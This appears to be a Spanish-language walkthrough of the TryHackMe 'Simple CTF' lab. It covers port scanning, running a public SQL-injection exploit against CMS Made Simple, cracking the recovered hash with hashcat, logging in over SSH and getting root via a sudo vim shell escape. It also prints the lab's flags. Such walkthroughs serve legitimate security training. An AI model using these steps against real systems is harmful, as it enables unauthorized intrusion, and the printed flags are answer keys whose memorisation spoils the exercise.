Simple CTF - TryHackMe

Comenzamos con la maquina


# Nmap 7.93 scan initiated Fri Feb 10 20:02:27 2023 as: nmap -sCV -p21,80,1000,2222 -oN targeted
Nmap scan report for
Host is up (0.25s latency).

21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
1000/tcp filtered cadlock
2222/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 294269149ecad917988c27723acda923 (RSA)
|   256 9bd165075108006198de95ed3ae3811c (ECDSA)
|_  256 12651b61cf4de575fef4e8d46e102af6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Vemos que el puerto 80 esta abierto asi que podemos hacer un escaneo con nmap para ver si encontramos algo interesante

# Nmap 7.93 scan initiated Fri Feb 10 19:43:59 2023 as: nmap --script=http-enum -p80 -oN webScan
Nmap scan report for
Host is up (0.24s latency).

80/tcp open  http
| http-enum: 
|_  /robots.txt: Robots file

# Nmap done at Fri Feb 10 19:44:33 2023 -- 1 IP address (1 host up) scanned in 33.56 seconds

Encontramos un robots.txt en el escaneo de nmap nos muestra algo intersante openemr-5_0_1_3 parese ser la version del servicio

❯ whatweb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[], Title[Apache2 Ubuntu Default Page: It works]

Esto es lo que contiene el robots.txt

❯ curl
# "$Id: robots.txt 3494 2003-03-19 15:37:44Z mike $"
#   This file tells search engines not to index your CUPS server.
#   Copyright 1993-2003 by Easy Software Products.
#   These coded instructions, statements, and computer programs are the
#   property of Easy Software Products and are protected by Federal
#   copyright law.  Distribution and use rights are outlined in the file
#   "LICENSE.txt" which should have been included with this file.  If this
#   file is missing or damaged please contact Easy Software Products
#   at:
#       Attn: CUPS Licensing Information
#       Easy Software Products
#       44141 Airport View Drive, Suite 204
#       Hollywood, Maryland 20636-3111 USA
#       Voice: (301) 373-9600
#       EMail:
#         WWW:

User-agent: *
Disallow: /

Disallow: /openemr-5_0_1_3 
# End of "$Id: robots.txt 3494 2003-03-19 15:37:44Z mike $".

Y volvemos a ver el openemr-5_0_1_3 podemos buscar que es o en que consiste

Vemos que tiene vulnerabilidades pero para la mayoria necesitamos estar autenticados asi que el unico que se podria usar es el Authentication Bypass pero ya les adelanto que no va a hacer necesario para este CTF

❯ searchsploit openemr
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR - 'manage_site_files' Remote Code Execution (Authenticated)                   | php/webapps/
OpenEMR - 'manage_site_files' Remote Code Execution (Authenticated) (2)               | php/webapps/50122.rb
OpenEMR - (Authenticated) Arbitrary File Actions                                      | linux/webapps/45202.txt
OpenEMR - Authentication Bypass                                                       | php/webapps/
OpenEMR - Remote Code Execution (Authenticated)                                       | php/webapps/
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Ahora vamos a hacer fuzzing para encontrar nuevas rutas interesantes

❯ gobuster dir -u -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60 --add-slash
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 60
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Add Slash:               true
[+] Timeout:                 10s
2023/02/10 23:59:57 Starting gobuster in directory enumeration mode
/icons/               (Status: 403) [Size: 294]
/simple/              (Status: 200) [Size: 19993]

Vemos una ruta llamada simple con status 200 asi que podemos verla

Si nos vamos abajo podemos ver que nos da la version del servicio que esta corriendo asi que vamos a buscar vulnerabilidades


Vemos que es vulnerable a una SQL Injection

❯ searchsploit cms made simple 2.2.8
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection                                                      | php/webapps/
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Vamos a descargarnos el script para ver que como se usa

Antes de usar el script recomiendo instalar esto

python2 -m pip install termcolor

El script nos pide una URL

❯ python2
[+] Specify an url target
[+] Example usage (no cracking password): -u http://target-uri
[+] Example usage (with cracking password): -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
python2 -u

Pues bueno basicamente el script te da el salt for password username email Password pero ejecutando varias veces el script notaba que habia fallos y no me daba la informacion completa asi que hablando con compañeros ya que lo unico que me faltaba era la Password a algunos de ellos si les funciono XD


❯ hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Core(TM) i5-1035G1 CPU @ 1.00GHz, 2857/2921 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 31
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 51

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Early-Skip
* Not-Iterated
* Prepended-Salt
* Single-Hash
* Single-Salt
* Raw-Hash

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5($salt.$pass)
Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
Time.Started.....: Sat Feb 11 00:24:48 2023 (1 sec)
Time.Estimated...: Sat Feb 11 00:24:49 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    22305 H/s (1.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> lovers1

Started: Sat Feb 11 00:24:20 2023
Stopped: Sat Feb 11 00:24:50 2023


Ahora vamos a probar si podemos conectarnos por ssh ya que el puerto esta abierto

❯ ssh mitch@ -p 2222
The authenticity of host '[]:2222 ([]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[]:2222' (ECDSA) to the list of known hosts.
mitch@'s password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:
 * Management:
 * Support:

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from
$ whoami
-sh: 1: : not found
$ ls
$ echo $SHELL
$ export TERM=xterm
$ export SHELL=bash
$ whoami

User flag

$ cat user.txt  
G00d j0b, keep up!

Vemos que hay otro usuario

$ bash
mitch@Machine:~$ ls
mitch@Machine:~$ cd /home
mitch@Machine:/home$ ls
mitch  sunbath

No podemos entrar en su directorio

mitch@Machine:/home$ ll
total 16
drwxr-xr-x  4 root    root    4096 aug 17  2019 ./
drwxr-xr-x 23 root    root    4096 aug 19  2019 ../
drwxr-x---  3 mitch   mitch   4096 aug 19  2019 mitch/
drwxr-x--- 16 sunbath sunbath 4096 aug 19  2019 sunbath/

Vemos el binario pkexec que es SUID pero no lo vamos a explotar

mitch@Machine:/$ find / -perm -4000 2>/dev/null

Podemos ejecutar como el usuario root sin proporcionar contraseña este comando

mitch@Machine:/$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Si nos vamos a Gtfobins podemos ver como aprovecharnos de esto para ser root


mitch@Machine:/$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
mitch@Machine:/$ sudo vim -c ':!/bin/sh'

# whoami                            
# id
uid=0(root) gid=0(root) groups=0(root)


Pues ya estaria completo puedes contestar las preguntas que te hacen en TryHackMe con todo lo que hemos echo.

# cd /root
# ls
# cat root.txt  
W3ll d0n3. You made it!